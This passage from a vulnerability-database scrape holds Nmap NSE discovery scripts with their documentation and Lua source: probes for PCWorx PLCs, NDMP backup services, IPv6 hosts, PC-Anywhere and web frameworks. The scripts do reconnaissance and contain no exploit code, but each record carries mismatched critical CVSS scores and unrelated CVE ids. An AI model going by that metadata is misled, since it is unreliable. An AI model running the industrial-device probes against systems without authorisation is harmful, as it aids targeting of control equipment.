1\n-- | SECUREMODE: FALSE\n-- | PRINTERVIDPID: 1 \"043d0180\"\n-- |_ product=(S300-S400: Series)\n\n-- Version 0.3\n-- Created 01/03/2010 - v0.1 - created by Patrik Karlsson\n-- Revised 01/13/2010 - v0.2 - revised script to use dns library\n-- Revised 01/23/2010 - v0.3 - revised script to use the proper ports\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.portnumber({5353,9100}, \"udp\")\n\naction = function( host, port )\n\n local result = {}\n local status, response = dns.query( \"\", { port = port.number, host = host.ip, dtype=\"PTR\", retPkt=true} )\n if ( not(status) ) then\n return\n end\n local status, txtrecords = dns.findNiceAnswer( dns.types.TXT, response, true )\n if ( not(status) ) then\n return\n end\n\n for _, v in ipairs( txtrecords ) do\n if ( v:len() > 0 ) then\n if v:find(\"PRINTERVIDPID\") then\n port.version.name=\"hbn3\"\n end\n if not v:find(\"product=\") then\n v = v:gsub(\" \", \": \", 1)\n end\n table.insert( result, v )\n end\n end\n\n -- set port to open\n nmap.set_port_state(host, port, \"open\")\n nmap.set_port_version(host, port)\n\n return stdnse.format_output(true, result)\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:39:34", "description": "This NSE script will query and parse pcworx protocol to a remote PLC. The script will send a initial request packets and once a response is received, it validates that it was a proper response to the command that was sent, and then will parse out the data. PCWorx is a protocol and Program by Phoenix Contact. \n\n<http://digitalbond.com>\n\n## Example Usage \n \n \n nmap --script pcworx-info -p 1962 <host>\n \n \n\n## Script Output \n \n \n | pcworx-info:\n | PLC Type: ILC 330 ETH\n | Model Number: 2737193\n | Firmware Version: 3.95T\n | Firmware Date: Mar 2 2012\n |_ Firmware Time: 09:39:02\n\n## Requires \n\n * [string](<>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-09-06T04:27:47", "type": "nmap", "title": "pcworx-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-01-14T15:30:31", "id": "NMAP:PCWORX-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/pcworx-info.html", "sourceData": "local string = require \"string\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nThis NSE script will query and parse pcworx protocol to a remote PLC.\nThe script will send a initial request packets and once a response is received,\nit validates that it was a proper response to the command that was sent, and then\nwill parse out the data. PCWorx is a protocol and Program by Phoenix Contact.\n\n\nhttp://digitalbond.com\n]]\n---\n-- @usage\n-- nmap --script pcworx-info -p 1962 <host>\n--\n--\n-- @output\n--| pcworx-info:\n--| PLC Type: ILC 330 ETH\n--| Model Number: 2737193\n--| Firmware Version: 3.95T\n--| Firmware Date: Mar 2 2012\n--|_ Firmware Time: 09:39:02\n\n--\n--\n-- @xmloutput\n--<elem key=\"PLC Type\">ILC 330 ETH</elem>\n--<elem key=\"Model Number\">2737193</elem>\n--<elem key=\"Firmware Version\">3.95T</elem>\n--<elem key=\"Firmware Date\">Mar 2 2012</elem>\n--<elem key=\"Firmware Time\">09:39:02</elem>\n\nauthor = \"Stephen Hilt (Digital Bond)\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\"}\n\nportrule = shortport.port_or_service(1962, \"pcworx\", \"tcp\")\n\n-- Safely extract a zero-terminated string if the blob is long enough\n-- Returns nil if it is not.\nlocal function get_string(blob, offset)\n if #blob >= offset then\n return string.unpack(\"z\", blob, offset)\n end\nend\n---\n-- Action Function that is used to run the NSE. This function will send the initial query to the\n-- host and port that were passed in via nmap. The initial response is parsed to determine if host\n-- is a pcworx Protocol device. If it is then more actions are taken to gather extra information.\n--\n-- @param host Host that was scanned via nmap\n-- @param port port that was scanned via nmap\naction = function(host,port)\n local init_comms = \"\\x01\\x01\\0\\x1a\\0\\0\\0\\0x\\x80\\0\\x03\\0\\x0cIBETH01N0_M\\0\"\n\n -- create table for output\n local output = stdnse.output_table()\n\n -- create new socket\n local socket = nmap.new_socket()\n -- define the catch of the try statement\n local catch = function()\n socket:close()\n end\n local try = nmap.new_try(catch)\n\n try(socket:connect(host, port))\n try(socket:send(init_comms))\n local response = try(socket:receive())\n\n if not response:match(\"^\\x81\") then\n stdnse.debug1(\"Unexpected or unknown PCWorx message.\")\n return nil\n end\n -- pcworx has a session ID that is generated by the PLC\n -- This will pull the SID so we can communicate further to the PLC\n local sid = string.sub(response, 18, 18)\n local init_comms2 = \"\\x01\\x05\\0\\x16\\0\\x01\\0\\0\\x78\\x80\\0\" .. sid .. \"\\0\\0\\0\\x06\\0\\x04\\x02\\x95\\0\\0\"\n try(socket:send(init_comms2))\n -- receive response\n response = try(socket:receive())\n -- TODO: verify this\n\n -- this is the request that will pull all the information from the PLC\n local req_info = \"\\x01\\x06\\0\\x0e\\0\\x02\\0\\0\\0\\0\\0\" .. sid .. \"\\x04\\0\"\n try(socket:send(req_info))\n -- receive response\n response = try(socket:receive())\n\n -- if the response starts with 0x81 then we will continue\n if not response:match(\"^\\x81\") then\n stdnse.debug1(\"Unexpected or unknown PCWorx message.\")\n socket:close()\n return nil\n end\n\n -- create output table with proper data\n output[\"PLC Type\"] = get_string(response, 31)\n output[\"Model Number\"] = get_string(response, 153)\n output[\"Firmware Version\"] = get_string(response, 67)\n output[\"Firmware Date\"] = get_string(response, 80)\n output[\"Firmware Time\"] = get_string(response, 92)\n\n -- close socket and return output table\n socket:close()\n return output\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:40:46", "description": "Retrieves version information from the remote Network Data Management Protocol (ndmp) service. NDMP is a protocol intended to transport data between a NAS device and the backup device, removing the need for the data to pass through the backup server. The following products are known to support the protocol: \n\n * Amanda \n * Bacula \n * CA Arcserve \n * CommVault Simpana \n * EMC Networker \n * Hitachi Data Systems \n * IBM Tivoli \n * Quest Software Netvault Backup \n * Symantec Netbackup \n * Symantec Backup Exec\n\n## Example Usage \n \n \n nmap -sV <target>\n\n## Requires \n\n * [ndmp](<../lib/ndmp.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-02-19T14:56:17", "type": "nmap", "title": "ndmp-version NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-07-28T16:06:18", "id": "NMAP:NDMP-VERSION.NSE", "href": "https://nmap.org/nsedoc/scripts/ndmp-version.html", "sourceData": "local ndmp = require \"ndmp\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nRetrieves version information from the remote Network Data Management Protocol\n(ndmp) service. NDMP is a protocol intended to transport data between a NAS\ndevice and the backup device, removing the need for the data to pass through\nthe backup server. The following products are known to support the protocol:\n* Amanda\n* Bacula\n* CA Arcserve\n* CommVault Simpana\n* EMC Networker\n* Hitachi Data Systems\n* IBM Tivoli\n* Quest Software Netvault Backup\n* Symantec Netbackup\n* Symantec Backup Exec\n]]\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"version\"}\n\n\nportrule = shortport.version_port_or_service(10000, \"ndmp\", \"tcp\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\nlocal function vendorLookup(vendor)\n if ( vendor:match(\"VERITAS\") ) then\n return \"Symantec/Veritas Backup Exec ndmp\"\n else\n return vendor\n end\nend\n\naction = function(host, port)\n local helper = ndmp.Helper:new(host, port)\n local status, err = helper:connect()\n if ( not(status) ) then return fail(\"Failed to connect to server\") end\n\n local hi, si\n status, hi = helper:getHostInfo()\n if ( not(status) ) then return fail(\"Failed to get host information from server\") end\n\n status, si = helper:getServerInfo()\n if ( not(status) ) then return fail(\"Failed to get server information from server\") end\n helper:close()\n\n port.version.name = \"ndmp\"\n port.version.product = vendorLookup(si.serverinfo.vendor)\n\n -- hostinfo can be nil if we get an auth error\n if ( hi.hostinfo ) then\n if ( hi.hostinfo.hostname ) then\n port.version.extrainfo = (\"Name: %s; \"):format(hi.hostinfo.hostname)\n end\n\n local major, minor, build, smajor, sminor = hi.hostinfo.osver:match(\"Major Version=(%d+) Minor Version=(%d+) Build Number=(%d+) ServicePack Major=(%d+) ServicePack Minor=(%d+)\")\n if ( major and minor and build and smajor and sminor ) then\n port.version.extrainfo = port.version.extrainfo .. (\"OS ver: %d.%d; OS Build: %d; OS Service Pack: %d\"):format(major, minor, build, smajor)\n end\n\n port.version.ostype = hi.hostinfo.ostype\n end\n\n nmap.set_port_version(host, port)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:33:53", "description": "Sends an ICMPv6 echo request packet to the all-nodes link-local multicast address (`ff02::1`) to discover responsive hosts on a LAN without needing to individually ping each IPv6 address.\n\n## Script Arguments \n\n#### newtargets \n\nIf true, add discovered targets to the scan queue.\n\n#### targets-ipv6-multicast-echo.interface \n\nThe interface to use for host discovery.\n\n#### max-newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n ./nmap -6 --script=targets-ipv6-multicast-echo.nse --script-args 'newtargets,interface=eth0' -sL\n\n## Script Output \n \n \n Pre-scan script results:\n | targets-ipv6-multicast-echo:\n | IP: 2001:0db8:0000:0000:0000:0000:0000:0001 MAC: 11:22:33:44:55:66 IFACE: eth0\n |_ Use --script-args=newtargets to add the results as targets\n\n## Requires \n\n * [coroutine](<>)\n * [ipOps](<../lib/ipOps.html>)\n * [nmap](<../lib/nmap.html>)\n * [packet](<../lib/packet.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n * [target](<../lib/target.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-09-02T04:11:00", "type": "nmap", "title": "targets-ipv6-multicast-echo NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2016-06-09T22:46:42", "id": "NMAP:TARGETS-IPV6-MULTICAST-ECHO.NSE", "href": "https://nmap.org/nsedoc/scripts/targets-ipv6-multicast-echo.html", "sourceData": "local coroutine = require \"coroutine\"\nlocal ipOps = require \"ipOps\"\nlocal nmap = require \"nmap\"\nlocal packet = require \"packet\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\nlocal target = require \"target\"\n\ndescription = [[\nSends an ICMPv6 echo request packet to the all-nodes link-local\nmulticast address (<code>ff02::1</code>) to discover responsive hosts\non a LAN without needing to individually ping each IPv6 address.\n]]\n\n---\n-- @usage\n-- ./nmap -6 --script=targets-ipv6-multicast-echo.nse --script-args 'newtargets,interface=eth0' -sL\n-- @output\n-- Pre-scan script results:\n-- | targets-ipv6-multicast-echo:\n-- | IP: 2001:0db8:0000:0000:0000:0000:0000:0001 MAC: 11:22:33:44:55:66 IFACE: eth0\n-- |_ Use --script-args=newtargets to add the results as targets\n-- @args newtargets If true, add discovered targets to the scan queue.\n-- @args targets-ipv6-multicast-echo.interface The interface to use for host discovery.\n\nauthor = {\"David Fifield\", \"Xu Weilin\"}\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\",\"broadcast\"}\n\n\nprerule = function()\n return nmap.is_privileged()\nend\n\nlocal function get_interfaces()\n local interface_name = stdnse.get_script_args(SCRIPT_NAME .. \".interface\")\n or nmap.get_interface()\n\n -- interfaces list (decide which interfaces to broadcast on)\n local interfaces = {}\n if interface_name then\n -- single interface defined\n local if_table = nmap.get_interface_info(interface_name)\n if if_table and ipOps.ip_to_str(if_table.address) and if_table.link == \"ethernet\" then\n interfaces[#interfaces + 1] = if_table\n else\n stdnse.debug1(\"Interface not supported or not properly configured.\")\n end\n else\n for _, if_table in ipairs(nmap.list_interfaces()) do\n if ipOps.ip_to_str(if_table.address) and if_table.link == \"ethernet\" then\n table.insert(interfaces, if_table)\n end\n end\n end\n\n return interfaces\nend\n\nlocal function single_interface_broadcast(if_nfo, results)\n stdnse.debug1(\"Starting \" .. SCRIPT_NAME .. \" on \" .. if_nfo.device)\n\n local condvar = nmap.condvar(results)\n local src_mac = if_nfo.mac\n local src_ip6 = ipOps.ip_to_str(if_nfo.address)\n local dst_mac = packet.mactobin(\"33:33:00:00:00:01\")\n local dst_ip6 = ipOps.ip_to_str(\"ff02::1\")\n\n ----------------------------------------------------------------------------\n --Multicast echo ping probe\n\n local dnet = nmap.new_dnet()\n local pcap = nmap.new_socket()\n\n local function catch ()\n dnet:ethernet_close()\n pcap:pcap_close()\n end\n local try = nmap.new_try(catch)\n\n try(dnet:ethernet_open(if_nfo.device))\n pcap:pcap_open(if_nfo.device, 128, false, \"icmp6 and ip6[6:1] = 58 and ip6[40:1] = 129\")\n\n local probe = packet.Frame:new()\n probe.mac_src = src_mac\n probe.mac_dst = dst_mac\n probe.ip_bin_src = src_ip6\n probe.ip_bin_dst = dst_ip6\n probe.echo_id = 5\n probe.echo_seq = 6\n probe.echo_data = \"Nmap host discovery.\"\n probe:build_icmpv6_echo_request()\n probe:build_icmpv6_header()\n probe:build_ipv6_packet()\n probe:build_ether_frame()\n\n try(dnet:ethernet_send(probe.frame_buf))\n\n pcap:set_timeout(1000)\n local pcap_timeout_count = 0\n local nse_timeout = 5\n local start_time = nmap:clock()\n local cur_time = nmap:clock()\n\n repeat\n local status, length, layer2, layer3 = pcap:pcap_receive()\n cur_time = nmap:clock()\n if not status then\n pcap_timeout_count = pcap_timeout_count + 1\n else\n local reply = packet.Frame:new(layer2..layer3)\n if reply.mac_dst == src_mac then\n local target_str = reply.ip_src\n if not results[target_str] then\n if target.ALLOW_NEW_TARGETS then\n target.add(target_str)\n end\n results[#results + 1] = { address = target_str, mac = stdnse.format_mac(reply.mac_src), iface = if_nfo.device }\n results[target_str] = true\n end\n end\n end\n until pcap_timeout_count >= 2 or cur_time - start_time >= nse_timeout\n\n dnet:ethernet_close()\n pcap:pcap_close()\n\n condvar(\"signal\")\nend\n\nlocal function format_output(results)\n local output = tab.new()\n\n for _, record in ipairs(results) do\n tab.addrow(output, \"IP: \" .. record.address, \"MAC: \" .. record.mac, \"IFACE: \" .. record.iface)\n end\n if #results > 0 then\n output = { tab.dump(output) }\n if not target.ALLOW_NEW_TARGETS then\n output[#output + 1] = \"Use --script-args=newtargets to add the results as targets\"\n end\n return stdnse.format_output(true, output)\n end\nend\n\naction = function()\n local threads = {}\n local results = {}\n local condvar = nmap.condvar(results)\n\n for _, if_nfo in ipairs(get_interfaces()) do\n -- create a thread for each interface\n local co = stdnse.new_thread(single_interface_broadcast, if_nfo, results)\n threads[co] = true\n end\n\n repeat\n for thread in pairs(threads) do\n if coroutine.status(thread) == \"dead\" then threads[thread] = nil end\n end\n if ( next(threads) ) then\n condvar \"wait\"\n end\n until next(threads) == nil\n\n return format_output(results)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:56", "description": "Sends a special broadcast probe to discover PC-Anywhere hosts running on a LAN.\n\n## Script Arguments \n\n#### broadcast-pc-anywhere.timeout \n\nspecifies the amount of seconds to sniff the network interface. (default varies according to timing. -T3 = 5s)\n\n## Example Usage \n \n \n nmap --script broadcast-pc-anywhere\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-pc-anywhere:\n |_ 10.0.200.113 - WIN2K3SRV-1\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [os](<>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-12-18T09:33:38", "type": "nmap", "title": "broadcast-pc-anywhere NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:BROADCAST-PC-ANYWHERE.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-pc-anywhere.html", "sourceData": "local nmap = require \"nmap\"\nlocal os = require \"os\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nSends a special broadcast probe to discover PC-Anywhere hosts running on a LAN.\n]]\n\n---\n-- @usage\n-- nmap --script broadcast-pc-anywhere\n--\n-- @output\n-- Pre-scan script results:\n-- | broadcast-pc-anywhere:\n-- |_ 10.0.200.113 - WIN2K3SRV-1\n--\n-- @args broadcast-pc-anywhere.timeout specifies the amount of seconds to sniff\n-- the network interface. (default varies according to timing. -T3 = 5s)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"broadcast\", \"safe\" }\n\nlocal TIMEOUT = stdnse.parse_timespec(stdnse.get_script_args(\"broadcast-pc-anywhere.timeout\"))\n\nprerule = function() return ( nmap.address_family() == \"inet\") end\n\naction = function()\n\n\n local host = { ip = \"255.255.255.255\" }\n local port = { number = 5632, protocol = \"udp\" }\n\n local socket = nmap.new_socket(\"udp\")\n socket:set_timeout(500)\n\n for i=1,2 do\n local status = socket:sendto(host, port, \"NQ\")\n if ( not(status) ) then\n return stdnse.format_output(false, \"Failed to send broadcast request\")\n end\n end\n\n local timeout = TIMEOUT or ( 20 / ( nmap.timing_level() + 1 ) )\n local responses = {}\n local stime = os.time()\n\n repeat\n local status, data = socket:receive()\n if ( status ) then\n local srvname = data:match(\"^NR([^_]*)_*AHM_3___\\0$\")\n if ( srvname ) then\n local status, _, _, rhost, _ = socket:get_info()\n if ( not(status) ) then\n socket:close()\n return false, \"Failed to get socket information\"\n end\n -- avoid duplicates\n responses[rhost] = srvname\n end\n end\n until( os.time() - stime > timeout )\n socket:close()\n\n local result = {}\n for ip, name in pairs(responses) do\n table.insert(result, (\"%s - %s\"):format(ip,name))\n end\n return stdnse.format_output(true, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:44:07", "description": "Tries to find out the technology behind the target website. \n\nThe script checks for certain defaults that might not have been changed, like common headers or URLs or HTML content. \n\nWhile the script does some guessing, note that overall there's no way to determine what technologies a given site is using. \n\nYou can help improve this script by adding new entries to nselib/data/http-devframework-fingerprints.lua \n\nEach entry must have: \n\n * `rapidDetect` \\- Callback function that is called in the beginning \nof detection process. It takes the host and port of target website as arguments. \n * `consumingDetect` \\- Callback function that is called for each \nspidered page. It takes the body of the response (HTML code) and the requested path as arguments. \n\nNote that the `consumingDetect` callback will not take place only if `rapid` option is enabled.\n\n## Script Arguments \n\n#### http-devframework.fingerprintfile \n\nFile containing fingerprints. Default: nselib/data/http-devframework-fingerprints.lua\n\n#### http-devframework.rapid \n\nboolean value that determines if a rapid detection should take place. The main difference of a rapid vs a lengthy detection is that second one requires crawling through the website. Default: false (lengthy detection is performed)\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### httpspider.doscraping, httpspider.maxdepth, httpspider.maxpagecount, httpspider.noblacklist, httpspider.url, httpspider.useheadfornonwebfiles, httpspider.withindomain, httpspider.withinhost \n\nSee the documentation for the [httpspider](<../lib/httpspider.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p80 --script http-devframework.nse <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n |_http-devframework: Django detected. Found Django admin login page on /admin/\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [httpspider](<../lib/httpspider.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2013-09-05T19:31:40", "type": "nmap", "title": "http-devframework NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-24T22:05:51", "id": "NMAP:HTTP-DEVFRAMEWORK.NSE", "href": "https://nmap.org/nsedoc/scripts/http-devframework.html", "sourceData": "description = [[\n\nTries to find out the technology behind the target website.\n\nThe script checks for certain defaults that might not have been changed, like\ncommon headers or URLs or HTML content.\n\nWhile the script does some guessing, note that overall there's no way to\ndetermine what technologies a given site is using.\n\nYou can help improve this script by adding new entries to\nnselib/data/http-devframework-fingerprints.lua\n\nEach entry must have:\n* <code>rapidDetect</code> - Callback function that is called in the beginning\nof detection process. It takes the host and port of target website as arguments.\n* <code>consumingDetect</code> - Callback function that is called for each\nspidered page. It takes the body of the response (HTML code) and the requested\npath as arguments.\n\nNote that the <code>consumingDetect</code> callback will not take place only if\n<code>rapid</code> option is enabled.\n\n]]\n\n---\n-- @usage nmap -p80 --script http-devframework.nse <target>\n--\n-- @args http-devframework.rapid boolean value that determines if a rapid detection\n-- should take place. The main difference of a rapid vs a lengthy detection\n-- is that second one requires crawling through the website. Default: false\n-- (lengthy detection is performed)\n-- @args http-devframework.fingerprintfile File containing fingerprints. Default: nselib/data/http-devframework-fingerprints.lua\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- |_http-devframework: Django detected. Found Django admin login page on /admin/\n---\n\ncategories = {\"discovery\", \"intrusive\"}\nauthor = \"George Chatzisofroniou\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal httpspider = require \"httpspider\"\nlocal _G = require \"_G\"\n\nportrule = shortport.port_or_service( {80, 443}, {\"http\", \"https\"}, \"tcp\", \"open\")\n\nlocal function loadFingerprints(filename)\n\n local file, fingerprints\n\n -- Find the file\n filename = nmap.fetchfile('nselib/data/' .. filename) or filename\n\n -- Load the file\n stdnse.debug1(\"Loading fingerprints: %s\", filename)\n local env = setmetatable({fingerprints = {}}, {__index = _G});\n file = loadfile(filename, \"t\", env)\n\n if( not(file) ) then\n stdnse.debug1(\"Couldn't load the file: %s\", filename)\n return\n end\n\n file()\n fingerprints = env.tools\n\n return fingerprints\n\nend\n\naction = function(host, port)\n\n local filename = stdnse.get_script_args(\"http-devframework.fingerprintfile\") or \"http-devframework-fingerprints.lua\"\n local tools = loadFingerprints(filename)\n if not tools then\n stdnse.debug1(\"Failed to load fingerprints\")\n return nil\n end\n local rapid = stdnse.get_script_args(\"http-devframework.rapid\")\n\n local d\n\n -- Run rapidDetect() callbacks.\n for f, method in pairs(tools) do\n d = method[\"rapidDetect\"](host, port)\n if d then\n return d\n end\n end\n\n local crawler = httpspider.Crawler:new(host, port, '/', { scriptname = SCRIPT_NAME,\n maxpagecount = 40,\n maxdepth = -1,\n withinhost = 1\n })\n\n if rapid then\n return \"Couldn't determine the underlying framework or CMS. Try turning off 'rapid' mode.\"\n end\n\n crawler.options.doscraping = function(url)\n if crawler:iswithinhost(url)\n and not crawler:isresource(url, \"js\")\n and not crawler:isresource(url, \"css\") then\n return true\n end\n end\n\n crawler:set_timeout(10000)\n\n while (true) do\n\n local response, path\n\n local status, r = crawler:crawl()\n -- if the crawler fails it can be due to a number of different reasons\n -- most of them are \"legitimate\" and should not be reason to abort\n if (not(status)) then\n if (r.err) then\n return stdnse.format_output(false, r.reason)\n else\n break\n end\n end\n\n response = r.response\n path = tostring(r.url)\n\n if (response.body) then\n\n -- Run consumingDetect() callbacks.\n for f, method in pairs(tools) do\n d = method[\"consumingDetect\"](response.body, path)\n if d then\n return d\n end\n end\n end\n\n return \"Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.\"\n\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:36:28", "description": "Creates a reverse index at the end of scan output showing which hosts run a particular service. This is in addition to Nmap's normal output listing the services on each host.\n\n## Script Arguments \n\n#### reverse-index.mode \n\nthe output display mode, can be either horizontal or vertical (default: horizontal)\n\n#### reverse-index.names \n\nIf set, index results by service name instead of port number. Unknown services will be listed by port number.\n\n## Example Usage \n \n \n nmap --script reverse-index <hosts/networks>\n \n\n## Script Output \n \n \n Post-scan script results:\n | reverse-index:\n | 22/tcp: 